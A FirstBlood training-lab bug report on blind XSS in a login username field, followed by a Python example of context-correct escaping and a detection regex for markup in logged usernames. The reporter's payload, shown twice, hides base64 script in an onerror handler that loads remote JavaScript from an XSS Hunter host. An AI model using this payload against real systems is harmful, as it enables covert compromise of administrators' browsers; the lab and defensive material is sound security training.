FirstBlood-#1320 — Blind XSS in username field
This issue was discovered on FirstBlood v3
On 2022-12-09, ayush1098 (Level 8) reported:
Hello Team,
Summary:
There is a hint mentioned on the login.php page that attempts to log in will be logged. After seeing this, I tried blind XSS payloads and got the pingback after a few hours from https://firstblood-helper.com/login_attempts.php?id=<id>.
Steps To Reproduce:
- Visit the login.php endpoint.
- Put your bxss payload in the username and password.
This was my payload
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
I am attaching my DOM report from XSS hunter: https://drive.google.com/file/d/1XKfqJ8G5abb58EEdAKV--8bXpiSxWLCo/view?usp=sharing
You will get the pingback after a few hours.
Thanks & Regards
Ayush Singh
P1 CRITICAL
Endpoint: /login.php
Parameter: username
Payload: "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
FirstBlood ID: 72
Vulnerability Type: Stored XSS
Login attempts were logged on an internal panel on firstblood-helper.com, and the username is vulnerable to blind XSS affecting FirstBlood staff.
Creator & Administrator
Congratulations, you were third to report this. You have won a LIMITED edition BugBountyHunter hat!
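The root cause described in the resolution above is a log-viewer sink: a value the application never displays to the person who typed it (the attempted username) is later rendered unescaped in a staff-only panel. The following is an added example, not code from FirstBlood or from the reporter, written in Python rather than the PHP the target uses. It assumes a server-side table renderer for a login-attempts panel and uses constructed sample records (with the base64 blob from the report replaced by a placeholder). It contrasts the raw-concatenation pattern with context-correct escaping, checks that no tag survives in the escaped output, and adds the kind of check a defender would run over the log store to surface attempts whose username contains markup.

```python
import html
import re

# Constructed sample log entries; not real FirstBlood data. Entry 2 uses the
# attribute-breaking shape from this report with the base64 id replaced by
# a placeholder, so we can verify the escaping on a realistic input.
SAMPLE_ATTEMPTS = [
    {"id": 1, "username": "alice", "ip": "203.0.113.7"},
    {"id": 2,
     "username": '"><video><source onerror=eval(atob(this.id)) id=PLACEHOLDER>',
     "ip": "203.0.113.8"},
]


def render_row_unsafe(attempt):
    """The pattern that turns a log panel into a blind-XSS sink:
    untrusted fields concatenated straight into HTML (attribute and text)."""
    name = attempt["username"]
    return (f'<tr><td>{attempt["id"]}</td>'
            f'<td title="{name}">{name}</td>'
            f'<td>{attempt["ip"]}</td></tr>')


def render_row_safe(attempt):
    """Escape every untrusted value for the context it lands in.
    quote=True also encodes " and ', which matters inside title="...".
    The PHP equivalent is htmlspecialchars($v, ENT_QUOTES, 'UTF-8')."""
    name = html.escape(attempt["username"], quote=True)
    ip = html.escape(attempt["ip"], quote=True)
    return (f'<tr><td>{int(attempt["id"])}</td>'
            f'<td title="{name}">{name}</td>'
            f'<td>{ip}</td></tr>')


def render_panel(attempts, row_fn=render_row_safe):
    """Assemble the table the staff panel would show."""
    rows = "".join(row_fn(a) for a in attempts)
    return f"<table>{rows}</table>"


# Any tag other than the template's own <table>/<tr>/<td> (open or close)
# in the rendered output means untrusted markup got through.
_FOREIGN_TAG_RE = re.compile(r"<(?!/?(?:table|tr|td)\b)[a-zA-Z]")


def injected_tags(rendered_html):
    """True if the rendered HTML contains a tag the template did not emit."""
    return bool(_FOREIGN_TAG_RE.search(rendered_html))


# Detection over the stored records: usernames are not expected to contain
# angle brackets, quotes, inline event handlers or javascript: URLs, so an
# attempt whose username does is worth an alert regardless of how the panel
# renders it.
_SUSPICIOUS_RE = re.compile(r"""[<>"']|\bon\w+\s*=|javascript:""", re.IGNORECASE)


def flag_suspicious_attempts(attempts):
    """Return the ids of login attempts whose username looks like markup."""
    return [a["id"] for a in attempts if _SUSPICIOUS_RE.search(a["username"])]


if __name__ == "__main__":
    print("unsafe panel injects tags:",
          injected_tags(render_panel(SAMPLE_ATTEMPTS, render_row_unsafe)))
    print("safe panel injects tags:",
          injected_tags(render_panel(SAMPLE_ATTEMPTS)))
    print("flagged attempt ids:", flag_suspicious_attempts(SAMPLE_ATTEMPTS))
```

Escaping at render time is the fix that closes the sink; the detection pass is independent of it and is useful precisely because a blind payload can sit in the log store for hours before anyone opens the panel, as the report notes. A Content-Security-Policy without `unsafe-inline` on the helper domain would additionally block the inline handler even if an escaping bug were reintroduced.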